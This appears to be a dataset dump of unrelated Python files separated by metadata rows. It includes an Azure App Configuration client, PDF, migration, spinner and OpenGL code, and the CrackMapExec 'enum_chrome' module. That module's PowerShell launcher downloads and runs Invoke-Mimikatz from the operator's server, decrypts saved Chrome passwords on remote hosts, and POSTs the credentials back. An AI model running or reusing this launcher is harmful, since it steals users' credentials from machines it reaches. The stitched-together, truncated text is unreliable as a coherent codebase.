header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_labels.metadata = {'url': '/labels'} # type: ignore
async def put_lock(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
**kwargs
) -> "_models.KeyValue":
"""Locks a key-value.
Locks a key-value.
:param key: The key of the key-value to lock.
:type key: str
:param label: The label, if any, of the key-value to lock.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.put_lock.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
put_lock.metadata = {'url': '/locks/{key}'} # type: ignore
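
    # --- Hedged usage sketch (added) ---
    # put_lock marks a key-value read-only; delete_lock (below) reverses it.
    # Key/label values are illustrative.
    #
    #     locked_kv = await client.put_lock("color", label="prod")
    #     unlocked_kv = await client.delete_lock("color", label="prod")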
async def delete_lock(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
**kwargs
) -> "_models.KeyValue":
"""Unlocks a key-value.
Unlocks a key-value.
:param key: The key of the key-value to unlock.
:type key: str
:param label: The label, if any, of the key-value to unlock.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.delete_lock.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
delete_lock.metadata = {'url': '/locks/{key}'} # type: ignore
def get_revisions(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Enum4"]]] = None,
**kwargs
) -> AsyncIterable["_models.KeyValueListResult"]:
"""Gets a list of key-value revisions.
Gets a list of key-value revisions.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Enum4]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyValueListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.KeyValueListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValueListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kvset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_revisions.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyValueListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_revisions.metadata = {'url': '/revisions'} # type: ignore
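
    # --- Hedged usage sketch (added) ---
    # Pages through the change history of matching key-values; `key` and
    # `label` act as filters per the query construction above. Illustrative.
    #
    #     async for revision in client.get_revisions(key="color", label="prod"):
    #         print(revision.etag, revision.last_modified)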
async def check_revisions(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Enum5"]]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Enum5]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_revisions.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_revisions.metadata = {'url': '/revisions'} # type: ignore
| [
"[email protected]"
] | |
303c660e3eef57e3a36afb062ecd39b07d4bc99b | 58df224689ab08c99359b1a6077d2fba3728dc61 | /lamda-ocr/merge-files/borb/io/write/page/write_pages_transformer.py | 68627bae287b7b3e25fae919b97dba2be46afbac | [] | no_license | LIT-Midas/LITHackathon | 2b286728c156d79d3f426f6d19b160a2a04690db | 7b990483dd48b91cf3ec3452b78ab67770da71af | refs/heads/main | 2023-08-13T05:22:59.373965 | 2021-08-16T01:09:49 | 2021-08-16T01:09:49 | 395,024,729 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,106 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This implementation of WriteBaseTransformer is responsible
for writing Dictionary objects of \Type \Pages
"""
import logging
import typing
from typing import Optional
from borb.io.read.types import AnyPDFType, Dictionary, Name, Reference
from borb.io.write.object.write_dictionary_transformer import WriteDictionaryTransformer
from borb.io.write.write_base_transformer import WriteTransformerState
logger = logging.getLogger(__name__)
class WritePagesTransformer(WriteDictionaryTransformer):
"""
This implementation of WriteBaseTransformer is responsible
for writing Dictionary objects of \Type \Pages
"""
def can_be_transformed(self, any: AnyPDFType):
"""
This function returns True if the object to be converted represents a \Pages Dictionary
"""
return isinstance(any, Dictionary) and "Type" in any and any["Type"] == "Pages"
def transform(
self,
object_to_transform: AnyPDFType,
context: Optional[WriteTransformerState] = None,
):
"""
This method writes a \Pages Dictionary to a byte stream
"""
assert isinstance(object_to_transform, Dictionary)
assert (
context is not None
), "A WriteTransformerState must be defined in order to write Pages Dictionary objects."
# \Kids can be written immediately
object_to_transform[Name("Kids")].set_can_be_referenced(False)
# queue writing of \Page objects
queue: typing.List[AnyPDFType] = []
for i, k in enumerate(object_to_transform["Kids"]):
queue.append(k)
ref: Reference = self.get_reference(k, context)
object_to_transform["Kids"][i] = ref
# delegate to super
super(WritePagesTransformer, self).transform(object_to_transform, context)
# write \Page objects
for p in queue:
self.get_root_transformer().transform(p, context)
# restore \Kids
for i, k in enumerate(queue):
object_to_transform["Kids"][i] = k
| [
"[email protected]"
] | |
b7e12c3f4b2d45fded162877ad86427111a6fb38 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03437/s315998808.py | e3d8b6ff4e9f3533a8b2b47253c581f3b116e5da | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 64 | py | X,Y=map(int,input().split())
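# If X is a multiple of Y, every multiple of X is also a multiple of Y, so no
# answer exists; otherwise X itself is a multiple of X not divisible by Y.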
if X%Y==0: print(-1)
else: print(X) | [
"[email protected]"
] | |
76f98d3da0ade232f07aceecf15d6408af840350 | 678770fcff8f01340dbea76bdc255a7f7dae7ce8 | /cme/modules/enum_chrome.py | ee01a980d9512560b1ee464fca2e648ed8eb3c60 | [
"BSD-2-Clause"
] | permissive | archey/CrackMapExec | 8a60d8f84332234636689dc448d6e58ae86bb02c | 3d010ea2f0321908f28bae5ba814a453e3d9b215 | refs/heads/master | 2021-01-12T04:13:22.955299 | 2016-12-28T18:23:31 | 2016-12-28T18:23:31 | 77,552,171 | 1 | 0 | null | 2016-12-28T18:12:49 | 2016-12-28T18:12:48 | null | UTF-8 | Python | false | false | 5,519 | py | from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, validate_ntlm, write_log
from datetime import datetime
from StringIO import StringIO
import re
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script (Mimikatz's DPAPI Module) to decrypt saved Chrome passwords
Module by @byt3bl33d3r
'''
name = 'enum_chrome'
description = "Uses Powersploit's Invoke-Mimikatz.ps1 script to decrypt saved Chrome passwords"
chain_support = False
def options(self, context, module_options):
'''
'''
return
def launcher(self, context, command):
'''
        Oook.. think my head's going to explode.
        Mimikatz's DPAPI module requires the path to Chrome's database in double quotes, otherwise it can't interpret paths with spaces.
        Problem is, Invoke-Mimikatz interprets double quotes as separators for the arguments passed to the injected Mimikatz binary.
        As far as I can figure out there is no way around this, hence we first copy Chrome's database to a path without spaces and then decrypt the entries with Mimikatz.
'''
launcher = '''
$cmd = "privilege::debug sekurlsa::dpapi"
$userdirs = get-childitem "$Env:SystemDrive\Users"
foreach ($dir in $userdirs) {{
$LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"
if ([System.IO.File]::Exists($LoginDataPath)) {{
$rand_name = -join ((65..90) + (97..122) | Get-Random -Count 7 | % {{[char]$_}})
$temp_path = "$Env:windir\Temp\$rand_name"
Copy-Item $LoginDataPath $temp_path
$cmd = $cmd + " `"dpapi::chrome /in:$temp_path`""
}}
}}
$cmd = $cmd + " exit"
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-Mimikatz -Command $cmd;
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip)
return create_ps_command(launcher)
def payload(self, context, command):
'''
        Since the Chrome decryption feature is relatively new, I had to manually compile the latest Mimikatz version,
        update the base64-encoded binary in the Invoke-Mimikatz.ps1 script,
        and apply a patch that @gentilkiwi posted at https://github.com/PowerShellMafia/PowerSploit/issues/147 for newer versions of Mimikatz to work when injected.
        Here we call the updated PowerShell script instead of PowerSploit's version.
'''
with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
return obfs_ps_script(ps_script.read())
def on_admin_login(self, context, connection, launcher, payload):
connection.execute(launcher, methods=['smbexec', 'atexec'])
context.log.success('Executed launcher')
def on_request(self, context, request, launcher, payload):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
request.wfile.write(payload)
else:
request.send_response(404)
request.end_headers()
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
buf = StringIO(data).readlines()
creds = []
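            # Assumed shape of Mimikatz's dpapi::chrome output parsed below
            # (illustrative; exact labels and spacing vary by version):
            #   URL      : https://example.com/login
            #   Username : alice
            #   <one metadata line>
            #   Password : hunter2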
try:
i = 0
while i < len(buf):
if ('URL' in buf[i]):
url = buf[i].split(':', 1)[1].strip()
user = buf[i+1].split(':', 1)[1].strip()
passw = buf[i+3].split(':', 1)[1].strip()
creds.append({'url': url, 'user': user, 'passw': passw})
i += 1
if creds:
context.log.success('Found saved Chrome credentials:')
for cred in creds:
context.log.highlight('URL: ' + cred['url'])
context.log.highlight('Username: ' + cred['user'])
context.log.highlight('Password: ' + cred['passw'])
context.log.highlight('')
except:
context.log.error('Error parsing Mimikatz output, please check log file manually for possible credentials')
log_name = 'EnumChrome-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
| [
"[email protected]"
] | |
00d2631d286f49fce9f9cd2239ebf7a8d7d64789 | c0665729c9d6d9981df3525a2937dbf82650e023 | /migrations/versions/88cf82c03451_.py | b041896d1e10abcc32ef4c59b6be6f11313d9fc8 | [] | no_license | anaf007/t923 | 3ebef05801904456953e128a9059db3c52252dc1 | 078d2c566c77afa2ca1be7663d3c23c9f0ecddac | refs/heads/master | 2020-03-25T08:39:01.200735 | 2018-12-12T14:56:59 | 2018-12-12T14:56:59 | 143,625,550 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 940 | py | """empty message
Revision ID: 88cf82c03451
Revises: d61c3c0d0a4a
Create Date: 2018-08-05 21:38:07.000959
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = '88cf82c03451'
down_revision = 'd61c3c0d0a4a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('is_center', sa.Boolean(), nullable=True))
op.alter_column('users', 'email',
existing_type=mysql.VARCHAR(length=80),
nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('users', 'email',
existing_type=mysql.VARCHAR(length=80),
nullable=False)
op.drop_column('users', 'is_center')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
6bb116d3f2cf2ad70af121abb33e58ed43bf50c3 | 98158b9e965e72b5a296be193931ce108bf0519e | /src/main/python/systemds/operator/algorithm/builtin/correctTypos.py | acbd0f9448f3e79f19f34fcd1d6dd511d21ccec2 | [
"Apache-2.0"
] | permissive | Shafaq-Siddiqi/systemml | 88dabaddf4763376bfcc46dc0f961ee9ab1cd438 | fecc4df3d6a9bba48d3ed72f6abcb7d3ce5582bf | refs/heads/main | 2023-04-27T14:22:05.333433 | 2022-05-22T10:08:06 | 2022-05-22T10:08:06 | 251,010,104 | 0 | 0 | Apache-2.0 | 2023-01-31T02:04:28 | 2020-03-29T10:54:14 | Java | UTF-8 | Python | false | false | 2,289 | py | # -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/correctTypos.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def correctTypos(strings: Frame,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
"""
:param frequency_threshold: Strings that occur above this frequency level will not be corrected
:param distance_threshold: Max distance at which strings are considered similar
:param is_verbose: Print debug information
:return: 'OperationNode' containing
"""
params_dict = {'strings': strings}
params_dict.update(kwargs)
vX_0 = Frame(strings.sds_context, '')
vX_1 = Scalar(strings.sds_context, '')
vX_2 = Scalar(strings.sds_context, '')
vX_3 = Matrix(strings.sds_context, '')
vX_4 = Frame(strings.sds_context, '')
output_nodes = [vX_0, vX_1, vX_2, vX_3, vX_4, ]
op = MultiReturn(strings.sds_context, 'correctTypos', output_nodes, named_input_nodes=params_dict)
vX_0._unnamed_input_nodes = [op]
vX_1._unnamed_input_nodes = [op]
vX_2._unnamed_input_nodes = [op]
vX_3._unnamed_input_nodes = [op]
vX_4._unnamed_input_nodes = [op]
return op
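
# --- Hedged usage sketch (added; commented out) ---
# Illustrative only: the exact read/compute calls are assumed from the
# systemds Python bindings and may differ by version.
#
#     from systemds.context import SystemDSContext
#     with SystemDSContext() as sds:
#         strings = sds.read("names.csv", data_type="frame")
#         results = correctTypos(strings, is_verbose=False).compute()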
| [
"[email protected]"
] | |
ce2a20b6cfa253ad34430502e424c381538ed45a | 7f5fa529f558853bf127a6f8f08d954121633542 | /pdm/_vendor/halo/halo_notebook.py | de595ff9c6ba0cba51b01c395a483b668acbe9eb | [
"MIT"
] | permissive | jeverling/pdm | 60335cc9912455c17a2fbbdf468f7f39c6cf943a | 22bb6a9cba5ded7dee688770f5f48f768e09bb65 | refs/heads/main | 2023-08-29T18:01:25.444405 | 2021-11-14T13:03:18 | 2021-11-14T13:03:18 | 427,973,885 | 1 | 0 | MIT | 2021-11-14T16:01:12 | 2021-11-14T16:01:12 | null | UTF-8 | Python | false | false | 3,219 | py | from __future__ import absolute_import, print_function, unicode_literals
import sys
import threading
import pdm._vendor.halo.cursor as cursor
from pdm._vendor.halo import Halo
from pdm._vendor.halo._utils import colored_frame, decode_utf_8_text
class HaloNotebook(Halo):
def __init__(
self,
text="",
color="cyan",
text_color=None,
spinner=None,
placement="left",
animation=None,
interval=-1,
enabled=True,
stream=sys.stdout,
):
super(HaloNotebook, self).__init__(
text=text,
color=color,
text_color=text_color,
spinner=spinner,
placement=placement,
animation=animation,
interval=interval,
enabled=enabled,
stream=stream,
)
self.output = self._make_output_widget()
def _make_output_widget(self):
from ipywidgets.widgets import Output
return Output()
    # TODO: use a property and a setter instead of this helper
def _output(self, text=""):
return ({"name": "stdout", "output_type": "stream", "text": text},)
def clear(self):
if not self.enabled:
return self
with self.output:
self.output.outputs += self._output("\r")
self.output.outputs += self._output(self.CLEAR_LINE)
self.output.outputs = self._output()
return self
def _render_frame(self):
frame = self.frame()
output = "\r{}".format(frame)
with self.output:
self.output.outputs += self._output(output)
def start(self, text=None):
if text is not None:
self.text = text
if not self.enabled or self._spinner_id is not None:
return self
if self._stream.isatty():
cursor.hide()
self.output = self._make_output_widget()
from IPython.display import display
display(self.output)
self._stop_spinner = threading.Event()
self._spinner_thread = threading.Thread(target=self.render)
        self._spinner_thread.daemon = True  # setDaemon() is deprecated
self._render_frame()
self._spinner_id = self._spinner_thread.name
self._spinner_thread.start()
return self
def stop_and_persist(self, symbol=" ", text=None):
"""Stops the spinner and persists the final frame to be shown.
Parameters
----------
symbol : str, optional
Symbol to be shown in final frame
text: str, optional
Text to be shown in final frame
Returns
-------
self
"""
if not self.enabled:
return self
symbol = decode_utf_8_text(symbol)
if text is not None:
text = decode_utf_8_text(text)
else:
text = self._text["original"]
text = text.strip()
if self._text_color:
text = colored_frame(text, self._text_color)
self.stop()
output = "\r{} {}\n".format(
*[(text, symbol) if self._placement == "right" else (symbol, text)][0]
)
with self.output:
self.output.outputs = self._output(output)
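
# --- Hedged usage sketch (added): meant for a Jupyter cell, since the class
# renders into an ipywidgets Output; spinner name and timing are illustrative.
if __name__ == "__main__":
    import time
    spinner = HaloNotebook(text="Working", spinner="dots")
    spinner.start()
    time.sleep(1)
    spinner.stop_and_persist(symbol="+", text="Done")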
| [
"[email protected]"
] | |
e060e41da085c54baadaffc2295a417a6d40a2f6 | b7b2f80ab5e1ee0ea028576e3014b62b8d3a8d7e | /pyfile/pyfm-010/fileicon.py | d0093c6c5e2653257b83e914445cef0f5980e4b0 | [] | no_license | pglen/pgpygtk | 4d1405478a714f003984cf3e3db04ff1f767470b | 33f58010e304f1a312f2356de453ecedb7aa21ef | refs/heads/master | 2021-01-22T01:18:52.238415 | 2019-01-01T01:37:24 | 2019-01-01T01:37:24 | 102,215,955 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,298 | py | #!/usr/bin/env python
#
# 3D File Manager in Python OpenGL, helper routines
#
import math, sys, subprocess
import gtk.gtkgl
from OpenGL.GL import *
from OpenGL.GLU import *
#from gtk.gtkgl.apputils import *
from OpenGL.GL.ARB.multitexture import *
class FileIcon():
def __init__(self, self2, fname, txt, command, xpos = 0, ypos = 0, zpos = 0):
global gl_name
self.pixbuf2 = None
self.command = command
self.self2 = self2
self.txt = txt; self.fname = fname
self.xpos = xpos; self.ypos = ypos; self.zpos = zpos
self.myname = self2.nextname()
self.focus = False
try:
pixbuf = gtk.gdk.pixbuf_new_from_file(fname)
except:
print "No image."
return
if not pixbuf.get_has_alpha():
#print "Adding Alpha", fname
#pixbuf.add_alpha(False, 255,255,255)
pixbuf.add_alpha(True, 0, 0, 0)
www = 256; hhh = 256
self.pixbuf2 = gtk.gdk.Pixbuf(gtk.gdk.COLORSPACE_RGB, True, 8, www, hhh)
pixbuf.scale(self.pixbuf2, 0, 0, www, hhh,
0, 0, float(www)/pixbuf.get_width(), float(hhh)/pixbuf.get_height(),
gtk.gdk.INTERP_BILINEAR)
def draw(self, pos_y, angle):
if not self.pixbuf2:
print "No image", self.fname
return
glPushMatrix ()
#print glGetString(GL_EXTENSIONS)
#glEnable(GL_TEXTURE_2D)
# Check the extension availability.
#if not glInitMultitextureARB():
# print "Help! No GL_ARB_multitexture"
# sys.exit(1)
glTranslatef (self.xpos, self.ypos - pos_y, self.zpos)
glRotatef (angle, 0.0, 1.0, 0.0)
siz = .4
glPushMatrix ()
exten = self.self2.font8.extent3Dstr(self.txt)
glTranslatef (-exten[0]/2, -siz * 1.5, 0.1)
self.self2.font8.print3Dstr(self.txt)
glPopMatrix ()
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_R, GL_CLAMP)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_R, GL_CLAMP_TO_EDGE)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
#glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_DECAL)
#glPixelStorei(GL_UNPACK_ALIGNMENT, 1)
#glPixelStorei(GL_UNPACK_SKIP_ROWS, 0)
